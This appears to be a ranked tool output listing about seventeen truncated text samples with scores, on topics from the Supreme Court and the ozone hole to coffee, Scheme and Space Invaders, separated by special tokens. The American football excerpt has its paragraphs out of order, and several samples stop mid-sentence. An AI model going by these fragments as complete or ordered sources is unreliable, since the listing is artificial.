ultimate responsibility of the Supreme Court of the United States. The Court is the highest tribunal in the Nation for all cases and controversies arising under the Constitution or the laws of the United States. As the final arbiter of the law, the Court is charged with ensuring the American people the promise of equal justice under law and, thereby, also functions as guardian and interpreter of the Constitution. + +The Supreme Court is "distinctly American in concept and function," as Chief Justice Charles Evans Hughes observed. Few other courts in the world have the same authority of constitutional interpretation and none have exercised it for as long or with as much influence. A century and a half ago, the French political observer Alexis de Tocqueville noted the unique position of the Supreme Court in the history of nations and of jurisprudence. "The representative system of government has been adopted in several states of Europe," he remarked, "but I am unaware that any nation of the globe has hitherto organized a judicial power in the same manner as the Americans.... A more imposing judicial power was never constituted by any people." + +The unique position of the Supreme Court stems, in large part, from the deep commitment of the American people to the Rule of Law and to constitutional government. The United States has demonstrated an unprecedented determination to preserve and protect its written Constitution, thereby providing the American "experiment in democracy" with the oldest written Constitution still in force. + +The Constitution of the United States is a carefully balanced document. It is designed to provide for a national government sufficiently strong and flexible to meet the needs of the republic, yet sufficiently limited and just to protect the guaranteed rights of citizens; it permits a balance between society’s need for order and the individual’s right to freedom. To assure these ends, the Framers of the Constitution created three independent and coequal branches of government. That this Constitution has provided continuous democratic government through the periodic stresses of more than two centuries illustrates the genius of the American system of government. + +The complex role of the Supreme Court in this system derives from its authority to invalidate legislation or executive actions which, in the Court’s considered judgment, conflict with the Constitution. This power of "judicial review" has given the Court a crucial responsibility in assuring individual rights, as well as in maintaining a "living Constitution" whose broad provisions are continually applied to complicated new situations. + +While the function of judicial review is not explicitly provided in the Constitution, it +================================================================================ +Rank = 49; Score = 868352.0 +<|begin_of_text|>What would the 1980s have been without big hair and ice-cold wine coolers? + +Luckily no one had to find out: Key substitutions in hairsprays and refrigerants allowed such products to exist without chlorofluorocarbons (CFCs), which were found to be ripping a huge "hole" in Earth's protective ozone layer. + +Today the ozone hole, which was first spotted 25 years ago, appears headed for a happy ending, thanks to unprecedented international action. + +Could a similar effort rein in climate change? And is the closing ozone hole actually making global warming worse? + +Ozone at High Risk From CFCs + +The ozone layer lies between about 9.3 and 18.6 miles (15 and 30 kilometers) above Earth's surface. This blanket of ozone, or O3, blocks most of the sun's high-frequency ultraviolet rays. + +These UV rays can cause skin cancer and cataracts in humans, as well as reproductive problems in fish, crabs, frogs, and even in the single-celled phytoplankton at the bottom of the ocean food chain. + +Ozone is created naturally when oxygen molecules (O2) high in the atmosphere get broken by sunlight into two free oxygen atoms. A free atom can then bond with an unbroken O2 molecule, and ozone is born. + +Ozone is unstable, however, and it's easily broken up by trace elements. + +Invented in the 1920s, CFCs proved to be an exceptional problem for ozone, because many of these synthetic chemicals can persist for decades, allowing them to make their way into the upper atmosphere. (Related: "Rocket Launches Damage Ozone Layer, Study Says.") + +In that rarefied air, ultraviolet light breaks the molecular bonds in CFCs and free chlorine atoms get released. Chlorine then destroys ozone molecules by "stealing" their oxygen atoms. + +Ozone Hole a Shocking Surprise + +Scientists had theorized since the 1970s about the chemistry that could lead to ozone depletion. But in May 1985 scientists with the British Antarctic Survey shocked the world when they announced the discovery of a huge hole in the ozone layer over Antarctica. + +Technically a substantial thinning of the ozone layer, the ozone "hole" has been opening every spring since the 1970s, the scientists reported. + +Their data, collected at the Halley Research Station in Antarctica, suggested that CFCs were to blame. That's because atmospheric conditions during the cold, dark, +================================================================================ +Rank = 50; Score = 864256.0 +<|begin_of_text|>[+]Enlarge Debris littered a lab bench after the explosion. Credit: Honolulu Fire Department + +An explosion last month that caused a University of Hawaii, Manoa, postdoctoral researcher to lose an arm was caused by a spark from a digital pressure gauge that was not designed for use with flammable gases, says a Honolulu Fire Department investigation report. + +Thea Ekins-Coward was combining hydrogen, carbon dioxide, and oxygen gases from high-pressure cylinders into a lower pressure tank when the incident occurred. She has not given the university permission to release information about her condition, said spokesman Daniel Meisenzahl at an April 18 press conference. + +The gas mixture was “food” for bacteria being used to produce biofuels and bioplastics. Ekins-Coward was working for the Hawaii Natural Energy Institute under researcher Jian Yu. A 2013 paper by Yu indicates a set-up in which gases are plumbed through a mixing device called a gas proportioner directly into the bioreactor (Int. J. Hydrogen Energy 2013, DOI: 10.1016/j.ijhydene.2013.04.153). The gas gauge identified in the paper is an “intrinsically safe” model designed to prevent ignition. + +But after Ekins-Coward started in the lab last fall, she purchased a 49-L steel gas tank, a different gauge not rated as intrinsically safe, a pressure-relief valve, and fittings, and she put them together, Yu and Ekins-Coward told fire department investigators, according to the report. Ekins-Coward would add the gases to the portable tank, which would then be connected to the bioreactor. She was using a mixture of 70% hydrogen, 25% oxygen, and 5% carbon dioxide for her experiments, the report says. + +In the week before the incident, a similar set-up with a 3.8-L tank resulted in a “small internal explosion” when Ekins-Coward pressed the off button on the gauge, the fire department report says. She also occasionally experienced static shocks when touching the tank, which was not grounded. She reported the shocks and possibly the small explosion to Yu, who told her not to worry about it, the report says. + +On the day of the incident, the 49-L tank exploded when Ekins-Coward pressed the off button on the gauge. “She did not lose consciousness or hit her head; she was aware that she lost her arm in the explosion,” the report +================================================================================ +Rank = 51; Score = 864256.0 +<|begin_of_text|>As massive Star Destroyers and Rebellion cruisers slowly draw within range of each other’s weapons, fleet admirals rush to dispense commands. These commands are guided by experience, training, and the rules of engagement, and they can mean the difference between life and death for the commanders and their crews. + +In Star Wars™: Armada, admirals are able to learn from their mistakes, but it’s still important that you understand the rules of the game. Prepare for your next battle by downloading the new Star Wars: Armada FAQ (pdf, 4.4 MB) and tournament rules (pdf, 5.4 MB) today. + +The FAQ will go into effect August 15th, 2015. The tournament rules will go into effect July 29th, 2015. + +A Word from the Developer + +Greetings, admirals! + +This version of the FAQ includes a few card clarifications and a couple of important rules updates. We’ve clarified that when you’re attacking squadrons, each roll against a different squadron counts as a separate attack. This is why you can resolve cards like Point-Defense Reroute and Dominator against each squadron you attack, not just one. Also, there were some edge cases in ship targeting where attacks that didn’t seem like they should be legal were indeed legal. We’ve clamped down on that by adding the rule that line of sight is broken if your attack’s range is measured through one of the defender’s hull zones. Most players are already playing this way without realizing it; now it’s codified. + +Thanks again to everyone who sends in rules questions! + +James Kniffen + +A Word from Organized Play + +The Star Wars: Armada tournament rules have seen some minor updates. While the initial document was solid, our tournament software, currently in beta, has created the need to update how pairings and strength of schedule work. + +Before we started work on our tournament software, stores and tournament organizers were often forced to run tournaments by hand. While many TOs have the math skills to run large tournaments with complicated tiebreakers, the time this adds to a tournament is significant and detrimental to players’ experiences. This limited the rules governing pairings and tiebreakers for our games in the past, but tournament software opens the possibilities of new methods and we have taken advantage of them to improve our tournaments. + +With our tournament software in the middle of its beta phase and seeing use out in the world, it’s become important to inform players of the new pairings and strength of +================================================================================ +Rank = 52; Score = 856064.0 +<|begin_of_text|>The gustatory system creates the human sense of taste, allowing us to perceive different flavors from substances that we consume as food and drink. Gustation, along with olfaction (the sense of smell), is classified as chemoreception. Because it functions by reacting with molecular chemical compounds in a given substance. Specialized cells in the gustatory system that are located on the tongue are called taste buds, and they sense tastants (taste molecules). The taste buds send the information after coming in contact with food from the tastants to the brain, where a molecule is processed as a certain taste. There are five main tastes: bitter, salty, sweet, sour, and umami (savory). All the varieties of flavor we experience are a combination of some or all of these tastes. + +The sense of taste is transduced by taste buds. Which are clusters of 50-100 taste receptor cells located in the tongue, soft palate, epiglottis, pharynx, and esophagus. The tongue is the main sensory organ of the gustatory system. The tongue contains papillae, or specialized epithelial cells, which have taste buds on their surface. There are three types of papillae with taste buds in the human gustatory system: + +Loading... + +fungiform papillae, which are mushroom-shaped and located at the tip of the tongue; + +foliate papillae, which are ridges and grooves toward the back of the tongue; + +circumvallate papillae, which are circular-shaped and located in a row just in front of the end of the tongue. + +You can’t taste food unless it’s mixed with your saliva + +Each taste bud is flask-like in shape and formed by two types of cells: supporting cells and gustatory cells. Gustatory cells are short-lived and are continuously regenerating. They each contain a taste pore at the surface of the tongue which is the site of sensory transduction. Though there are small differences in sensation, all taste buds, no matter their location, can respond to all types of taste.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 53; Score = 851968.0 +<|begin_of_text|>Making coffee to drink + +For the agricultural and industrial processes for producing whole coffee beans, see Coffee processing + +Filter coffee being brewed + +Coffee preparation is the process of turning coffee beans into a beverage. While the particular steps vary with the type of coffee and with the raw materials, the process includes four basic steps: raw coffee beans must be roasted, the roasted coffee beans must then be ground, the ground coffee must then be mixed with hot water for a certain time (brewed), and finally the liquid coffee must be separated from the used grounds. + +Coffee is usually brewed immediately before drinking. In most areas, coffee may be purchased unprocessed, or already roasted, or already roasted and ground. Coffee is often vacuum packed to prevent oxidation and lengthen its shelf life. + +Roasting [ edit ] + +Dutch coffee-roasting machine, c. 1920 + +Roasting coffee transforms the chemical and physical properties of green coffee beans. When roasted, the green coffee bean expands to nearly double its original size, changing in color and density. As the bean absorbs heat, its color shifts to yellow, then to a light "cinnamon" brown, and then to a rich dark brown color. During roasting, oils appear on the surface of the bean. The roast will continue to darken until it is removed from the heat source. + +Coffee can be roasted with ordinary kitchen equipment (frying pan, grill, oven, popcorn popper) or by specialised appliances. A coffee roaster is a special pan or apparatus suitable to heat up and roast green coffee beans. + +Grinding [ edit ] + +An old-fashioned manual burr-mill coffee grinder + +Wheel coffee grinder + +Coffee grinder + +The whole coffee beans are ground, also known as milling, to facilitate the brewing process. + +The fineness of the grind strongly affects brewing. Brewing methods that expose coffee grounds to heated water for longer require a coarser grind than faster brewing methods. Beans that are too finely ground for the brewing method in which they are used will expose too much surface area to the heated water and produce a bitter, harsh, "over-extracted" taste. At the other extreme, an overly coarse grind will produce weak coffee unless more is used. Due to the importance of a grind's fineness, a uniform grind is highly desirable. + +If a brewing method is used in which the time of exposure of the ground coffee to the heated water is adjustable, then a short brewing time can be used for finely ground coffee. This produces coffee of equal flavor yet uses less ground coffee. A blade grinder does not +================================================================================ +Rank = 54; Score = 847872.0 +<|begin_of_text|>Supply and demand is perhaps one of the most fundamental concepts of economics and it is the backbone of a market economy. Demand refers to how much (quantity) of a product or service is desired by buyers. The quantity demanded is the amount of a product people are willing to buy at a certain price; the relationship between price and quantity demanded is known as the demand relationship. Supply represents how much the market can offer. The quantity supplied refers to the amount of a certain good producers are willing to supply when receiving a certain price. The correlation between price and how much of a good or service is supplied to the market is known as the supply relationship. Price, therefore, is a reflection of supply and demand. + +The relationship between demand and supply underlie the forces behind the allocation of resources. In market economy theories, demand and supply theory will allocate resources in the most efficient way possible. How? Let us take a closer look at the law of demand and the law of supply. + +A. The Law of Demand + +The law of demand states that, if all other factors remain equal, the higher the price of a good, the less people will demand that good. In other words, the higher the price, the lower the quantity demanded. The amount of a good that buyers purchase at a higher price is less because as the price of a good goes up, so does the opportunity cost of buying that good. As a result, people will naturally avoid buying a product that will force them to forgo the consumption of something else they value more. The chart below shows that the curve is a downward slope. + +A, B and C are points on the demand curve. Each point on the curve reflects a direct correlation between quantity demanded (Q) and price (P). So, at point A, the quantity demanded will be Q1 and the price will be P1, and so on. The demand relationship curve illustrates the negative relationship between price and quantity demanded. The higher the price of a good the lower the quantity demanded (A), and the lower the price, the more the good will be in demand (C). + +B. The Law of Supply + +Like the law of demand, the law of supply demonstrates the quantities that will be sold at a certain price. But unlike the law of demand, the supply relationship shows an upward slope. This means that the higher the price, the higher the quantity supplied. Producers supply more at a higher price because selling a higher quantity at a higher price increases revenue. + +A, B and C are points on the supply +================================================================================ +Rank = 55; Score = 843776.0 +<|begin_of_text|>COLUMBUS, Ohio—Researchers at The Ohio State University have discovered how to control heat with a magnetic field. + +In the March 23 issue of the journal Nature Materials, they describe how a magnetic field roughly the size of a medical MRI reduced the amount of heat flowing through a semiconductor by 12 percent. + +The study is the first ever to prove that acoustic phonons—the elemental particles that transmit both heat and sound—have magnetic properties. + +“This adds a new dimension to our understanding of acoustic waves,” said Joseph Heremans, Ohio Eminent Scholar in Nanotechnology and professor of mechanical engineering at Ohio State. “We’ve shown that we can steer heat magnetically. With a strong enough magnetic field, we should be able to steer sound waves, too.” + +Joseph Heremans + +People might be surprised enough to learn that heat and sound have anything to do with each other, much less that either can be controlled by magnets, Heremans acknowledged. But both are expressions of the same form of energy, quantum mechanically speaking. So any force that controls one should control the other. + +“Essentially, heat is the vibration of atoms,” he explained. “Heat is conducted through materials by vibrations. The hotter a material is, the faster the atoms vibrate. + +“Sound is the vibration of atoms, too,” he continued. “It’s through vibrations that I talk to you, because my vocal chords compress the air and create vibrations that travel to you, and you pick them up in your ears as sound.” + +The name “phonon” sounds a lot like “photon.” That’s because researchers consider them to be cousins: Photons are particles of light, and phonons are particles of heat and sound. But researchers have studied photons intensely for a hundred years—ever since Einstein discovered the photoelectric effect. Phonons haven’t received as much attention, and so not as much is known about them beyond their properties of heat and sound. + +Hyungyu Jin + +This study shows that phonons have magnetic properties, too. + +“We believe that these general properties are present in any solid,” said Hyungyu Jin, Ohio State postdoctoral researcher and lead author of the study. + +The implication: In materials such as glass, stone, plastic—materials that are not conventionally magnetic—heat can be controlled magnetically, if you have a powerful enough magnet. The effect would go unnoticed in metals, which transmit so much heat via electrons that any heat carried by phonons is negligible by comparison. + +There won’t be any practical applications of this discovery +================================================================================ +Rank = 56; Score = 827392.0 +<|begin_of_text|>Airglow (also called nightglow) is a faint emission of light by a planetary atmosphere. In the case of Earth's atmosphere, this optical phenomenon causes the night sky to never be completely dark, even after the effects of starlight and diffused sunlight from the far side are removed. + +History [ edit ] + +Airglow in Allier, France, on the night of 13 August 2015 + +The airglow phenomenon was first identified in 1868 by Swedish physicist Anders Ångström. Since then, it has been studied in the laboratory, and various chemical reactions have been observed to emit electromagnetic energy as part of the process. Scientists have identified some of those processes that would be present in Earth's atmosphere, and astronomers have verified that such emissions are present. + +Description [ edit ] + +Airglow is caused by various processes in the upper atmosphere of Earth, such as the recombination of atoms which were photoionized by the Sun during the day, luminescence caused by cosmic rays striking the upper atmosphere, and chemiluminescence caused mainly by oxygen and nitrogen reacting with hydroxyl free radicals at heights of a few hundred kilometres. It is not noticeable during the daytime due to the glare and scattering of sunlight. + +Even at the best ground-based observatories, airglow limits the photosensitivity of optical telescopes. Partly for this reason, space telescopes like Hubble can observe much fainter objects than current ground-based telescopes at visible wavelengths. + +Airglow at night may be bright enough for a ground observer to notice and appears generally bluish. Although airglow emission is fairly uniform across the atmosphere, it appears brightest at about 10° above the observer's horizon, since the lower one looks, the greater the depth of atmosphere one is looking through. Very low down, however, atmospheric extinction reduces the apparent brightness of the airglow. + +One airglow mechanism is when an atom of nitrogen combines with an atom of oxygen to form a molecule of nitric oxide (NO). In the process, a photon is emitted. This photon may have any of several different wavelengths characteristic of nitric oxide molecules. The free atoms are available for this process, because molecules of nitrogen (N 2 ) and oxygen (O 2 ) are dissociated by solar energy in the upper reaches of the atmosphere and may encounter each other to form NO. Other species that can create air glow in the atmosphere are hydroxyl (OH),[2][3][4] atomic oxygen (O +================================================================================ +Rank = 57; Score = 823296.0 +<|begin_of_text|>Ancient Greek terracotta statuette of a dancing maenad, 3rd century BC, from Taranto + +The history of dance is difficult to access because dance does not often leave behind clearly identifiable physical artifacts that last over millennia, such as stone tools, hunting implements or cave paintings. It is not possible to identify with exact precision when dance became part of human culture. + +Early dance [ edit ] + +Dance has been an important part of ceremony, rituals, celebrations and entertainment since before the birth of the earliest human civilizations. Archaeology delivers traces of dance from prehistoric times such as the 30,000-year-old Bhimbetka rock shelters paintings in India and Egyptian tomb paintings depicting dancing figures from c. 3300 BC. Many contemporary dance forms can be traced back to historical, traditional, ceremonial, and ethnic dances of the ancient period. + +Means of social communication and bonding [ edit ] + +Dance may have been used as a tool of social interaction that promoted cooperation essential for survival among early humans. Studies found that today's best dancers share two specific genes associated with a predisposition for being good social communicators.[1] + +As folk celebrations [ edit ] + +Many dances of the early periods were performed to celebrate festivals, on important or seasonal occasions such as crop harvest, or births and weddings. Such dances are found all over the world.[2] + +In ceremonies and rituals [ edit ] + +Dance may be performed in religious or shamanic rituals, for example in rain dance performed in times of drought. Shamans dancing for rain is mentioned in ancient Chinese texts. Dance is an important aspect of some religious rites in ancient Egypt,[3] similarly dance is also integral to many ceremonies and rites among African people.[4] Ritual dances may also be performed in temples and during religious festivals, for example the Rasa ritual dances of India (a number of Indian classical dances may have their origin in ritual dances), and the Cham dances of Tibet.[5] + +As a method of healing [ edit ] + +Another early use of dance may have been as a precursor to ecstatic trance states in healing rituals. Dance is used for this purpose by many cultures from the Brazilian rainforest to the Kalahari Desert.[6] Medieval European danses macabres were thought to have protected participants from disease; however; the hysteria and duration of these dances sometimes led to death due to exhaustion.[7] + +According to a Sinhalese legend, Kandyan dances originated 2500 years ago, from a magic dance ritual that broke the spell on a bewitched +================================================================================ +Rank = 58; Score = 786432.0 +<|begin_of_text|>Temperatures are warming up in the world of astronomy after a team of researchers discovered ice crystals on a comet, suggesting it could be as old as the solar system. + +An international research team discovered the ice in crystalline form on the surface of comet 67P Churyumov-Gerasimenko, Churi for short, indicating that it was formed 4.6 billion years ago — the results of the experiment have been published in the Astrophysical Journal. + +The comet, which is part of the planet Jupiter family, has found to have ice crystals on its surface that could have originated in space before the solar system or the sun was formed in conditions described by scientists as protosolar nebula. + +Hi @ESA_Rosetta! Comet #67P on 05 Mar 16 from a distance of 20km (more at https://t.co/lNzznIHGkw) pic.twitter.com/tyzkA2AS3a — Rosetta OSIRIS (@Rosetta_OSIRIS) 10 March 2016​ + +By analyzing chemicals trapped in the ice on the comet's surface, researchers were able to determine the age of the ice crystals using a mass spectrometer — which is an instrument that can measure the masses and relative concentrations of atoms and molecules. A statement from the French National Center for Scientific Research (CNRS) said: + +"If comets are made of crystalline ice, this means that they must have formed at the same time as the solar system, that than earlier in the interstellar medium." + +Before Life Began + +The discovery of ice crystals on Churi could have implications on future research surrounding how the earth and solar system began life. + +"In October 2014 [the mass spectrometer] first measured amounts of molecular nitrogen (N2), carbon monoxide (CO) and argon (Ar) in Churi's ice," a statement from the French National Centre for Scientific Research (CNRS) said. + +© Flickr / Stuart Rankin Comet Chaser Discovers Oxygen on 67P/ Churyumov-Gerasimenko + +"The data was compared with that from laboratory experiments on amorphous ice, as well as from models describing the composition of gas hydrates, a type of crystalline ice in which water molecules can trap molecules of gas." + +The levels of nitrogen and argon gas in the ice led the researchers to conclude that is had a crystalline structure, suggesting the ice on the surface of the comet could have been formed before the solar system, or even at the same +================================================================================ +Rank = 59; Score = 778240.0 +<|begin_of_text|>Introduction + +Following Algol, Scheme is a statically scoped programming language. Each use of a variable is associated with a lexically apparent binding of that variable. + +Scheme has latent as opposed to manifest types. Types are associated with objects (also called values) rather than with variables. (Some authors refer to languages with latent types as untyped, weakly typed or dynamically typed languages.) + +Other languages with latent types are Python, Ruby, Smalltalk, and other dialects of Lisp. + +Languages with manifest types (sometimes referred to as strongly typed or statically typed languages) include Algol 60, C, C#, Java, Haskell, and ML. + +Scheme was one of the first languages to support procedures as objects in their own right. Procedures can be created dynamically, stored in data structures, returned as results of procedures, and so on. Other languages with these properties include Common Lisp, Haskell, ML, Ruby, and Smalltalk. + +One distinguishing feature of Scheme is that continuations - which in most other languages only operate behind the scenes - also have “first-class” status. First-class continuations are useful for implementing a wide variety of advanced control constructs, including non-local exits, backtracking, and coroutines. + +In Scheme, the argument expressions of a procedure call are evaluated before the procedure gains control, whether the procedure needs the result of the evaluation or not. + +C, C#, Common Lisp, Python, Ruby, and Smalltalk are other languages that always evaluate argument expressions before invoking a procedure. + +This is distinct from the lazy-evaluation semantics of Haskell, or the call-by-name semantics of Algol 60, where an argument expression is not evaluated unless its value is needed by the procedure. + +Tutorial through code examples + +All the code snippets of this page are live and interactive powered by the klipse plugin: + +Live: The code is executed in your browser Interactive: You can modify the code and it is evaluated as you type + +This tutorial is an interactive adaptation of the Overview of Scheme written by r6rs.org. + +The evaluation of scheme code in the browser is powered by biwascheme. + +Basic types + +Scheme programs manipulate objects, which are also referred to as values. Scheme objects are organized into sets of values called types. This section gives an overview of the fundamentally important types of the Scheme language. More types are described in later chapters. + +As Scheme is latently typed, the use of the term type in this report differs from the use of the term in the context of other languages, particularly those with manifest typing. + +Booleans + +A boolean +================================================================================ +Rank = 60; Score = 778240.0 +<|begin_of_text|>The United States Transportation Security Administration has recently come under scrutiny for, among other things, its use of X-ray full-body scanners in airports to see through clothes and to detect non-metallic explosives. But are they safe? A group of UC-San Francisco professors recently raised a number of safety concerns regarding these scanners. While the Obama administration attempted to address these worries, its assertion that the scanners are safe appears to fall short. + +The TSA has slowly been implementing the use of X-ray scanners in airports (so far, 38 airports have 206 of the machines) in order to see through passengers' clothes and check them for explosive devices. Officials have asserted that the machines are okay to use on the basis of the everyday use of X-rays in medical offices. However, a group of four UCSF professors pinpointed several important differences between the medical X-ray machines and those used in airports. They described the issues in a letter to Dr. John P. Holdren, the assistant to the president for science and technology. + +A normal X-ray image is a familiar sight—depending on the exposure, an X-rayed person typically appears only as a skeleton. This is because the X-rays used in those machines penetrate the skin and can only scatter off of the larger atoms in bones. + +Unlike a medical X-ray, the TSA X-ray machines are a sci-fi fan's dream: they are lower-energy beams that can only penetrate clothing and the topmost layers of skin. This provides TSA agents with a view that would expose any explosives concealed by clothing. But according to the UCSF professors, the low-energy rays do a "Compton scatter" off tissue layers just under the skin, rather than the bone, possibly exposing some vital areas and leaving the tissues at risk of mutation. + +When an X-ray Compton scatters, it doesn't shift an electron to a higher energy level; instead, it hits the electron hard enough to dislodge it from its atom. The authors note that this process is "likely breaking bonds," which could cause mutations in cells and raise the risk of cancer. + +Because the X-rays only make it just under the skin's surface, the total volume of tissue responsible for absorbing the radiation is fairly small. The professors point out that many body parts that are particularly susceptible to cancer are just under the surface, such as breast tissue and testicles. They are also concerned with those over 65, as well as children, being exposed to the X-rays. + +The professors pointed to a number of other issues, including the possibility that TSA +================================================================================ +Rank = 61; Score = 778240.0 +<|begin_of_text|>The international governing body for the sport is the International Federation of American Football (IFAF); although the organization plays all of its international competitions under American rules, it uses a definition of the game that is broad enough that it includes Canadian football under its umbrella, and Football Canada (the governing body for Canadian football) is an IFAF member. + +American football teams and organizations subsequently adopted new rules which distinguished the game from rugby. [19] Among the most consequential changes was the adoption of the forward pass in 1906, which allowed the quarterback to throw the ball forward over the line of scrimmage to a receiver. [20] Canadian football remained akin to rugby for decades, though a progressive faction of players, chiefly based in the western provinces, demanded changes to the game based on the innovations in American football. Over the years, the sport adopted more Americanized rules, though it retained some of its historical features, including a 110-yard field, 12-player teams, and three downs instead of four. [3] + +The sport developed from informal games played in North America during the 19th century. Early games had a variety of local rules and were generally similar to modern rugby union and soccer. By the 1860s, teams from universities were playing each other, leading to more standardized rules and the creation of college football. While several American schools adopted rules based on the soccer rules of the British Football Association, Harvard University held to its traditional "carrying game". Meanwhile, McGill University in Montreal used rules based on rugby union. In 1874, Harvard and McGill University in Montreal organized two games using each other's rules. Harvard took a liking to McGill's rugby-style rules, and subsequently played several other U.S. colleges over the next several years. [18] + +The football used in North American football has a distinct pointed shape, with a brown color and prominent laces to aid in throwing + +This is a minimal description of the game in general, with elements common to all or almost all variants of the game. For more specific rules, see each code's individual articles. + +Prior to the start of a game, a coin toss determines which team will kick off the ball to their opponent. Each team lines up on opposite halves of the field, with a minimum ten yards of space between them for the kickoff. The team receiving the ball can make a fair catch (which stops the play immediately), catch the ball and run it back until the ball carrier is tackled, or, if the ball is kicked out of bounds, let the +================================================================================ +Rank = 62; Score = 774144.0 +<|begin_of_text|>Overview + +One of the earliest shooting games, Space Invaders was released by Taito in Japan on June 19, 1978. Gameplay involves attempting to defeat waves of aliens cascading down from the top of the screen with a laser cannon that moves along a fixed horizontal axis. The only goal is to earn as many points as possible. Designer Tomohiro Nishikado was in charge of planning, graphic design, and programming for the game and drew creative inspiration from such diverse sources as Gun Fight, Breakout, The War of the Worlds, and Star Wars. The game’s development cycle lasted for one year, during which Nishikado created custom hardware and software. The game achieved massive popularity upon its release (leading to a temporary shortage of one hundred yen coins in Japan), and helped usher in the golden age of arcade video games (circa 1978-1984). + +Space Invaders sold over 400,000 arcade cabinets worldwide and grossed around $3.8 billion in revenue by 1982, equivalent to over $13 billion in 2014, making it the highest-grossing video game of all time. + +Gameplay + +Arcade (cabaret/cocktail) version + +Gameplay in Space Invaders is relatively simple. The player controls a small ship that can only move laterally across the bottom of the screen and fires vertically. Five rows of eleven aliens each advance slowly from one side of the screen to the other, dropping down one space and reversing direction when they reach either side. The player’s task is to acquire points by eliminating enemies and to destroy all of the aliens before they reach the bottom of the screen and complete their “invasion.” As aliens are destroyed, the speed of the remaining enemies increases, as does the tempo of the music. Once all of the enemies are destroyed, the wave resets and the difficulty increases (a cycle that can continue indefinitely). + +The Invaders constantly shoot back at the player as they advance from side to side across the screen. To help avoid their attacks, the player can hide behind a number of destructible barriers or “bunkers” near the bottom of the screen (four in the original version). Occasionally a “mystery ship” will appear near the top of the screen and move quickly from one side to the other while making a distinctive klaxon noise. Destroying it rewards the player with a sizeable point bonus. + +Development + +While working for the Taito Corporation, designer Nishikado was inspired to create Space Inv +================================================================================ +Rank = 63; Score = 765952.0 +<|begin_of_text|>Germany (German: Deutschland), officially the Federal Republic of Germany (German: Bundesrepublik Deutschland), is a country in Central Europe. + +The first modern unified state in German history was the German Empire, founded in 1871 by Wilhelm I, King of Prussia. The country was a member of the Central Powers during World War I alongside Austro-Hungarian Empire and the Ottoman Empire. However, as their war effort collapsed in 1918, the empire fell to civil conflicts, resulting in the abdication of Emperor Wilhelm II and the end of the German Empire. The Weimar Republic that succeeded the empire carried the burdens of the war in the years that followed. + +Probably one of the most infamous eras of German history was the fascist Nazi regime of the Third Reich or Nazi Germany. In 1933, Adolf Hitler and his Nazi Party came to power within the Weimar Republic, and soon seized all power from the democratic Reichstag. In the years that followed, Hitler built an enormous and zealous army and annexed neighboring countries, including Austria and Czechoslovakia. On September 1, 1939, Nazi Germany invaded Poland, prompting a declaration of war from France and the United Kingdom, sparking World War II. + +Contents show] + +Armed Forces Edit + +Military Branches Edit + +These are the military branches of the German Empire: + +Seal/Flag Branch The Imperial German Army was the combined land and air forces of the German Empire. The Imperial German Navy was the naval force of the German Empire. + +These are the military branches of Nazi Germany: + +Emblem Branch The Wehrmacht is the primary military force of the Nazi Germany. It is divided into the Heer (army), the Luftwaffe (air force) and the Kriegsmarine (navy). The German Elite Forces represent an unspecified elite unit of the Third Reich's Wehrmacht, taking cues from the real life Fallschirmjäger and Waffen-SS units. The Afrika Korps was Germany's expeditionary force to North Africa between February 12, 1941 to May 13, 1943. + +These are the military branches of the Federal Republic of Germany: + +Emblem Branch In modern times, Germany's armed forces are called the Bundeswehr (Federal Defense) and serve alongside other NATO forces around the world. + +Military Organizations Edit + +Germany is a part of both NATO and the European Union, both of which are featured as factions in their own rights in the Battlefield series. Germany is therefore presumably +================================================================================ +Rank = 64; Score = 757760.0 +<|begin_of_text|>IBM and Ogilvy make a big impact with the smallest of building blocks in their latest video, billed as "the world's smallest movie"—a rudimentary stop-motion animation made by IBM scientists using a special microscope they invented to move atoms around on a surface. + +The movie, titled "A Boy and His Atom," consists of nearly 250 frames of stop-motion action and tells the simple story of a boy named Atom who dances and plays with an atom. By drawing viewers in with the film (a technological marvel that will no doubt be passed around far and wide), IBM then uses an engrossing behind-the-scenes clip to tell its larger story—about how the company has worked at the nanoscale for decades to explore the limits of data storage, among other things with real-world applications. + +Andreas Heinrich, a principle investigator at IBM Research, is the most eloquent voice of the project. "Capturing, positioning and shaping atoms to create an original motion picture on the atomic level is a precise science and entirely novel," he says. "At IBM, researchers don't just read about science, we do it. This movie is a fun way to share the atomic-scale world and show everyday people the challenges and fun science can create." + +The consequences of IBM's research at the atomic level are also put into useful context—using, fittingly enough, the movies as a gauge. Today's electronic devices need roughly 1 million atoms to store a single bit of data. But IBM researchers have shown that only 12 atoms are actually needed to store one bit. The implications for data storage are astonishing—it means that one day, every movie ever made could be stored in a device the size of a fingernail. + +While IBM works on that, it hopes this movie accomplishes a simpler goal: getting kids to love science. As Heinrich says: "If I can do this by making a movie, and I can get a thousand kids to join science rather than go into law school, I'd be super happy." + +CREDITS + +Client: IBM + +Agency: Ogilvy & Mather, New 